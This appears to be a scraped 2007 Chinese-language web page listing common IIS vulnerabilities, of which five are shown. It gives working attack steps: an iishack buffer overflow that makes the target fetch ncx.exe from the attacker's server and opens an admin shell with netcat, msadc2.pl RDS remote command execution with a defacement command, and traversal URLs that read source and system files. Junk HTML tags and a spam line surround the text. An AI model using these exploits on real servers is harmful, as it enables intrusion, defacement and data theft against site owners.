• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • IIS的十七個常見安全漏洞

    發表于:2007-07-02來源:作者:點擊數: 標簽:
    1. iis4hack緩沖溢出 主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.t

    1. iis4hack緩沖溢出
    主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

    c:>iishack.exe 80 /ncx.exe

    然后你就使.netcat來連接你要檢測的服務器:

    c:>nc 80
    如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

    2.msadc
    IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help
    [quack@chat quack]$ perl msadc2.pl -h
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    Usage: msadc.pl -h { -d -X -v }
    -h = host you want to scan (ip or domain)
    -d = delay between calls, default 1 second
    -X = dump Index Server path table, if available
    -N = query VbBusObj for NetBIOS name
    -V = use VbBusObj instead of ActiveDataFactory
    -v = verbose
    -e = external dictionary file for step 5
    -u <\hostsharefile> = use UNC file
    -w = Windows 95 instead of Windows NT
    -c = v1 compatibility (three step query)
    -s = run only step
    Or a -R will resume a (v2) command session
    [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    Type the command line you want to run (cmd /c assumed):
    cmd /c
    如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:
    echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

    3.Codebrws.asp
    察看文件源代碼
    http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp


    4.Showcode.asp
    察看文件源代碼
    http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini


    5.Null.htw
    察看文件源代碼
    http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

    [1]     

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>